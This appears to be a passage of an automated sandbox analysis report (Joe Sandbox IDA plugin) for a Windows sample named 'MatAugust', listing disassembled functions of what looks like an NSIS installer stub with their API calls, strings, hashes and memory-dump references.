API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
API String ID: 20674999-2124804629
Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68

Function 004040B8 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
GetDlgItem.USER32(?,000003E8), ref: 00404181
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
GetSysColor.USER32(?), ref: 004041AF
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
lstrlenW.KERNEL32(?), ref: 004041D6
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2

Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004

GetDlgItem.USER32(?,0000040A), ref: 0040424A
SendMessageW.USER32(00000000), ref: 00404251
GetDlgItem.USER32(?,000003E8), ref: 0040427E
SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
SetCursor.USER32(00000000), ref: 004042D2
ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
SetCursor.USER32(00000000), ref: 004042F6
SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337

Strings

open, xrefs: 004042DF
@%F, xrefs: 004042A7
N, xrefs: 0040426C

Memory Dump Source

Source File: 00000000.00000002.1664294255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1664274638.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664347328.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666507283.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MatAugust.jbxd

Similarity

API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
String ID: @%F$N$open
API String ID: 3928313111-3849437375
Opcode ID: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
Instruction ID: 2c1438ad93098d7b112eeb2502b55652a68651cb38e922ac8f4fb42b83a973d4
Opcode Fuzzy Hash: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
Instruction Fuzzy Hash: 0F71A4B1900609FFDB109F60DD45EAA7B79FB44305F00843AFA05B62D1C778A991CF99

Function 00406A99 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 163filestringmemoryCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(0045B2C8,NUL,?,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AA9
CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1

Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8

GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
wsprintfA.USER32 ref: 00406B4D
GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37

Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76

WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
GlobalFree.KERNEL32(00000000), ref: 00406C52
CloseHandle.KERNEL32(?), ref: 00406C5C

Strings

%s=%s, xrefs: 00406B43
[Rename], xrefs: 00406BC8, 00406BD7
NUL, xrefs: 00406A9E
F, xrefs: 00406AE8

Memory Dump Source

Source File: 00000000.00000002.1664294255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1664274638.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664347328.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666507283.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MatAugust.jbxd

Similarity

API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
String ID: F$%s=%s$NUL$[Rename]
API String ID: 565278875-1653569448
Opcode ID: a2f4805b9b6d14c41e9e3fa236157f8587e3d6293513dd7448d110fd9e4d9510
Instruction ID: f97e154d5ee7f709bd30e138c0dd6e282719408add8f0d739c14b832633f1bd9
Opcode Fuzzy Hash: a2f4805b9b6d14c41e9e3fa236157f8587e3d6293513dd7448d110fd9e4d9510
Instruction Fuzzy Hash: AE412632104208BFE6206B619E8CD6B3B6CDF86754B16043EF586F22D1DA3CDC158ABC

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010D8
FillRect.USER32(00000000,?,00000000), ref: 004010ED
DeleteObject.GDI32(?), ref: 004010F6
CreateFontIndirectW.GDI32(?), ref: 0040110E
SetBkMode.GDI32(00000000,00000001), ref: 0040112F
SetTextColor.GDI32(00000000,000000FF), ref: 00401139
SelectObject.GDI32(00000000,?), ref: 00401149
DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
SelectObject.GDI32(00000000,00000000), ref: 00401169
DeleteObject.GDI32(?), ref: 0040116E
EndPaint.USER32(?,?), ref: 00401177

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.1664294255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1664274638.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664347328.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666507283.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MatAugust.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
Instruction ID: e7530e13063599d95e155ed3b2c7b7521dfa2668d538c4695d9c695e9582dc0d
Opcode Fuzzy Hash: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
Instruction Fuzzy Hash: 01516C71400209AFCB058F95DE459AF7FB9FF45311F00802EF992AA1A0CB78DA55DFA4

Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
RegCloseKey.ADVAPI32(?), ref: 004029E4

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
WriteReg: error creating key "%s\%s", xrefs: 004029F5
WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1

Memory Dump Source

Source File: 00000000.00000002.1664294255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1664274638.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664347328.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666507283.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MatAugust.jbxd

Similarity

API ID: lstrlen$CloseCreateValuewvsprintf
String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
API String ID: 1641139501-220328614
Opcode ID: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
Instruction ID: 4ea7a0066738be70411365ddd6f3e5606018e51d84950e7919a1ab5782edcef9
Opcode Fuzzy Hash: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
Instruction Fuzzy Hash: 3D41BFB2D00209BFDF11AF90CE46DAEBBB9EB04704F20407BF505B61A1D6B94B509B59

Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
GlobalFree.KERNEL32(00000000), ref: 00402F17
CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
DeleteFileW.KERNEL32(?), ref: 00402F56

Strings

created uninstaller: %d, "%s", xrefs: 00402F3B

Memory Dump Source

Source File: 00000000.00000002.1664294255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1664274638.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664347328.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666507283.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MatAugust.jbxd

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID: created uninstaller: %d, "%s"
API String ID: 3294113728-3145124454
Opcode ID: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
Instruction ID: 876417c632a2c352b67fb01c84f3ccb8dada3a759dccfb7ac575e016526b3130
Opcode Fuzzy Hash: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
Instruction Fuzzy Hash: E231B272800115BBCB11AFA4CE45DAF7FB9EF08364F10023AF555B61E1CB794E419B98

Function 004060E7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72filestringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040619B
lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7

Strings

RMDir: RemoveDirectory invalid input(""), xrefs: 00406195, 0040619A, 004061A1, 004061B0

Memory Dump Source

Source File: 00000000.00000002.1664294255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1664274638.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664347328.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666507283.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MatAugust.jbxd

Similarity

API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
String ID: RMDir: RemoveDirectory invalid input("")
API String ID: 3734993849-2769509956
Opcode ID: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
Instruction ID: 719ae6cd10854ac59b0cdc08190af65770ef99398ad526dd54b0ef62760a23c4
Opcode Fuzzy Hash: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
Instruction Fuzzy Hash: 4621F271400200BBD710AB64DD88D9B376CEB02370B25C73AF626BA1E1E77449868BAD

Function 004023F0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 83libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C

Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
FreeLibrary.KERNEL32(?,?), ref: 004024C3

Strings

Error registering DLL: %s not found in %s, xrefs: 0040249A
Error registering DLL: Could not load %s, xrefs: 004024DB
xb^, xrefs: 00402473
Error registering DLL: Could not initialize OLE, xrefs: 004024F1

Memory Dump Source

Source File: 00000000.00000002.1664294255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1664274638.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664347328.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666507283.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MatAugust.jbxd

Similarity

API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$xb^
API String ID: 1033533793-3889714692
Opcode ID: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
Instruction ID: e967fad4df15afb35ea17a6f8951328f27fda4bee3b51f855042d01f5ead75df
Opcode Fuzzy Hash: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
Instruction Fuzzy Hash: 34219131904208BBCF206FA1CE45E9E7A74AF40314F30817FF511B61E1D7BD4A819A5D

Function 00403DCA Relevance: 12.1, APIs: 8, Instructions: 60COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
GetSysColor.USER32(00000000), ref: 00403E00
SetTextColor.GDI32(?,00000000), ref: 00403E0C
SetBkMode.GDI32(?,?), ref: 00403E18
GetSysColor.USER32(?), ref: 00403E2B
SetBkColor.GDI32(?,?), ref: 00403E3B
DeleteObject.GDI32(?), ref: 00403E55
CreateBrushIndirect.GDI32(?), ref: 00403E5F

Memory Dump Source

Source File: 00000000.00000002.1664294255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1664274638.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664347328.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666507283.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MatAugust.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
Instruction ID: efe235911933e34786796033030fc6f48e67331b78f43f6f4bde0ddab4ebbdd0
Opcode Fuzzy Hash: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
Instruction Fuzzy Hash: 7D1166715007046BCB219F78DE08B5BBFF8AF01755F048A2DE886F22A0D774DA48CB94

Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71

WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2

Strings

Exec: failed createprocess ("%s"), xrefs: 004022C2
Exec: command="%s", xrefs: 00402241
Exec: success ("%s"), xrefs: 00402263

Memory Dump Source

Source File: 00000000.00000002.1664294255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1664274638.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664347328.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666507283.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_MatAugust.jbxd

Similarity

API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
API String ID: 2014279497-3433828417
Opcode ID: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
Opcode Fuzzy Hash: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D

Function 0040484E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
GetMessagePos.USER32 ref: 00404871
ScreenToClient.USER32(?,?), ref: 00404889
SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1

Strings

f, xrefs: 0040489D

Memory Dump Source

Source File: 00000000.00000002.1664294255.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1664274638.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664347328.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664381982.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
